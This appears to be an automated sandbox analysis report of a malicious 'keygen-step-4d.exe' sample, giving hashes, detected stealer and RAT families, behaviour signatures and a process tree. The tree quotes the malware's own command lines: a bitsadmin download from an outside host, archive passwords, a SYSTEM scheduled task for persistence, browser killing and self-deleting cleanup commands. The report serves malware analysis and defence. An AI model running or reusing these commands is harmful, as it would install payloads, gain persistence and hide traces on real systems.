Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1802s
  • max time network
    1538s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    06-05-2021 08:37

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 59 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 33 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 37 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
      PID:1440
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2464
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2700
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2740
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2724
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2544
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1992
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
              • Modifies registry class
              PID:1296
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Themes
              1⤵
                PID:1224
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                1⤵
                  PID:1108
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1064
                  • C:\Users\Admin\AppData\Roaming\tcvdijb
                    C:\Users\Admin\AppData\Roaming\tcvdijb
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:4420
                    • C:\Users\Admin\AppData\Roaming\tcvdijb
                      C:\Users\Admin\AppData\Roaming\tcvdijb
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:7648
                  • C:\Users\Admin\AppData\Roaming\tcvdijb
                    C:\Users\Admin\AppData\Roaming\tcvdijb
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:1896
                    • C:\Users\Admin\AppData\Roaming\tcvdijb
                      C:\Users\Admin\AppData\Roaming\tcvdijb
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5884
                  • C:\Users\Admin\AppData\Roaming\tcvdijb
                    C:\Users\Admin\AppData\Roaming\tcvdijb
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:8144
                    • C:\Users\Admin\AppData\Roaming\tcvdijb
                      C:\Users\Admin\AppData\Roaming\tcvdijb
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5816
                  • C:\Windows\system32\rundll32.exe
                    C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll",ASqacOXEm
                    2⤵
                    • Windows security modification
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:4156
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                  1⤵
                    PID:340
                  • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                    "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                    1⤵
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:672
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:508
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                        3⤵
                        • Loads dropped DLL
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:944
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2348
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:1128
                      • C:\Users\Admin\AppData\Local\Temp\is-LPID3.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-LPID3.tmp\Install.tmp" /SL5="$40156,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:3812
                        • C:\Users\Admin\AppData\Local\Temp\is-U9AV9.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-U9AV9.tmp\Ultra.exe" /S /UID=burnerch1
                          4⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3864
                          • C:\Program Files\Java\WGXFWUTIYP\ultramediaburner.exe
                            "C:\Program Files\Java\WGXFWUTIYP\ultramediaburner.exe" /VERYSILENT
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:2208
                            • C:\Users\Admin\AppData\Local\Temp\is-HFU5H.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-HFU5H.tmp\ultramediaburner.tmp" /SL5="$8007C,281924,62464,C:\Program Files\Java\WGXFWUTIYP\ultramediaburner.exe" /VERYSILENT
                              6⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:3952
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                7⤵
                                • Executes dropped EXE
                                PID:580
                          • C:\Users\Admin\AppData\Local\Temp\3a-d73d0-693-254b8-d664096571882\Lazhohojotae.exe
                            "C:\Users\Admin\AppData\Local\Temp\3a-d73d0-693-254b8-d664096571882\Lazhohojotae.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3208
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\brpl0a1p.y4l\KiffMainE1.exe & exit
                              6⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4560
                              • C:\Users\Admin\AppData\Local\Temp\brpl0a1p.y4l\KiffMainE1.exe
                                C:\Users\Admin\AppData\Local\Temp\brpl0a1p.y4l\KiffMainE1.exe
                                7⤵
                                • Executes dropped EXE
                                PID:7724
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aujtw3vn.o5i\001.exe & exit
                              6⤵
                              • Suspicious use of WriteProcessMemory
                              PID:7712
                              • C:\Users\Admin\AppData\Local\Temp\aujtw3vn.o5i\001.exe
                                C:\Users\Admin\AppData\Local\Temp\aujtw3vn.o5i\001.exe
                                7⤵
                                • Executes dropped EXE
                                PID:7900
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zuo3ikcy.rx3\installer.exe /qn CAMPAIGN="654" & exit
                              6⤵
                                PID:8068
                                • C:\Users\Admin\AppData\Local\Temp\zuo3ikcy.rx3\installer.exe
                                  C:\Users\Admin\AppData\Local\Temp\zuo3ikcy.rx3\installer.exe /qn CAMPAIGN="654"
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Enumerates connected drives
                                  • Modifies system certificate store
                                  • Suspicious use of FindShellTrayWindow
                                  PID:5420
                                  • C:\Windows\SysWOW64\msiexec.exe
                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zuo3ikcy.rx3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zuo3ikcy.rx3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620037986 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                    8⤵
                                      PID:6540
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mbj3ehee.w5q\gpooe.exe & exit
                                  6⤵
                                    PID:5792
                                    • C:\Users\Admin\AppData\Local\Temp\mbj3ehee.w5q\gpooe.exe
                                      C:\Users\Admin\AppData\Local\Temp\mbj3ehee.w5q\gpooe.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:5948
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                          PID:5384
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                          • Executes dropped EXE
                                          PID:4304
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                          • Executes dropped EXE
                                          PID:6456
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                          • Executes dropped EXE
                                          PID:5992
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aaikmvb0.3nr\google-game.exe & exit
                                      6⤵
                                        PID:4468
                                        • C:\Users\Admin\AppData\Local\Temp\aaikmvb0.3nr\google-game.exe
                                          C:\Users\Admin\AppData\Local\Temp\aaikmvb0.3nr\google-game.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:4604
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                            8⤵
                                            • Loads dropped DLL
                                            • Modifies registry class
                                            PID:4688
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tplgbkv4.uoc\huesaa.exe & exit
                                        6⤵
                                          PID:4936
                                          • C:\Users\Admin\AppData\Local\Temp\tplgbkv4.uoc\huesaa.exe
                                            C:\Users\Admin\AppData\Local\Temp\tplgbkv4.uoc\huesaa.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5272
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:7552
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:6092
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:7824
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:6860
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3deihjd3.jyb\askinstall39.exe & exit
                                          6⤵
                                            PID:864
                                            • C:\Users\Admin\AppData\Local\Temp\3deihjd3.jyb\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\3deihjd3.jyb\askinstall39.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:6272
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                8⤵
                                                  PID:6516
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    9⤵
                                                    • Kills process with taskkill
                                                    PID:6668
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iunpki2t.etr\setup.exe & exit
                                              6⤵
                                                PID:6352
                                                • C:\Users\Admin\AppData\Local\Temp\iunpki2t.etr\setup.exe
                                                  C:\Users\Admin\AppData\Local\Temp\iunpki2t.etr\setup.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:6492
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\iunpki2t.etr\setup.exe"
                                                    8⤵
                                                      PID:6920
                                                      • C:\Windows\SysWOW64\PING.EXE
                                                        ping 1.1.1.1 -n 1 -w 3000
                                                        9⤵
                                                        • Runs ping.exe
                                                        PID:7056
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cswsd2zv.xyr\y1.exe & exit
                                                  6⤵
                                                    PID:6804
                                                    • C:\Users\Admin\AppData\Local\Temp\cswsd2zv.xyr\y1.exe
                                                      C:\Users\Admin\AppData\Local\Temp\cswsd2zv.xyr\y1.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:7008
                                                      • C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Modifies system certificate store
                                                        PID:7904
                                                        • C:\Users\Admin\AppData\Roaming\1620297385974.exe
                                                          "C:\Users\Admin\AppData\Roaming\1620297385974.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620297385974.txt"
                                                          9⤵
                                                          • Executes dropped EXE
                                                          PID:5528
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe"
                                                          9⤵
                                                            PID:4328
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping 127.0.0.1 -n 3
                                                              10⤵
                                                              • Runs ping.exe
                                                              PID:7792
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\cswsd2zv.xyr\y1.exe"
                                                          8⤵
                                                            PID:5844
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /T 10 /NOBREAK
                                                              9⤵
                                                              • Delays execution with timeout.exe
                                                              PID:6048
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b5sczjbj.lsr\Setup_v3.exe & exit
                                                        6⤵
                                                          PID:7096
                                                          • C:\Users\Admin\AppData\Local\Temp\b5sczjbj.lsr\Setup_v3.exe
                                                            C:\Users\Admin\AppData\Local\Temp\b5sczjbj.lsr\Setup_v3.exe
                                                            7⤵
                                                              PID:7364
                                                              • C:\Windows\SysWOW64\at.exe
                                                                "C:\Windows\System32\at.exe"
                                                                8⤵
                                                                  PID:7560
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                                  8⤵
                                                                    PID:7892
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\System32\cmd.exe
                                                                      9⤵
                                                                        PID:5356
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                          Fessura.exe.com Z
                                                                          10⤵
                                                                          • Executes dropped EXE
                                                                          PID:7304
                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                            11⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:4800
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                              12⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:5712
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                              12⤵
                                                                              • Executes dropped EXE
                                                                              PID:7468
                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                          findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                          10⤵
                                                                            PID:6948
                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                            ping 127.0.0.1 -n 30
                                                                            10⤵
                                                                            • Runs ping.exe
                                                                            PID:7664
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                        8⤵
                                                                          PID:5408
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dfmj2in1.4g0\toolspab1.exe & exit
                                                                      6⤵
                                                                        PID:7332
                                                                        • C:\Users\Admin\AppData\Local\Temp\dfmj2in1.4g0\toolspab1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\dfmj2in1.4g0\toolspab1.exe
                                                                          7⤵
                                                                            PID:7784
                                                                            • C:\Users\Admin\AppData\Local\Temp\dfmj2in1.4g0\toolspab1.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\dfmj2in1.4g0\toolspab1.exe
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:5324
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aksgx00m.tga\005.exe & exit
                                                                          6⤵
                                                                            PID:7484
                                                                            • C:\Users\Admin\AppData\Local\Temp\aksgx00m.tga\005.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\aksgx00m.tga\005.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:8128
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\omuv3xc5.rzr\SunLabsPlayer.exe /S & exit
                                                                            6⤵
                                                                              PID:7960
                                                                              • C:\Users\Admin\AppData\Local\Temp\omuv3xc5.rzr\SunLabsPlayer.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\omuv3xc5.rzr\SunLabsPlayer.exe /S
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Drops file in Program Files directory
                                                                                PID:5636
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:6464
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:4592
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:5228
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:6512
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:6348
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:7268
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                              • Checks for any installed AV software in registry
                                                                                              PID:7572
                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                              8⤵
                                                                                              • Download via BitsAdmin
                                                                                              PID:8140
                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              • Drops file in Program Files directory
                                                                                              PID:6300
                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pTu7FDc7mojSd2jD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:6728
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:4644
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  9⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5384
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:6532
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                                  8⤵
                                                                                                    PID:6564
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                      PID:6572
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
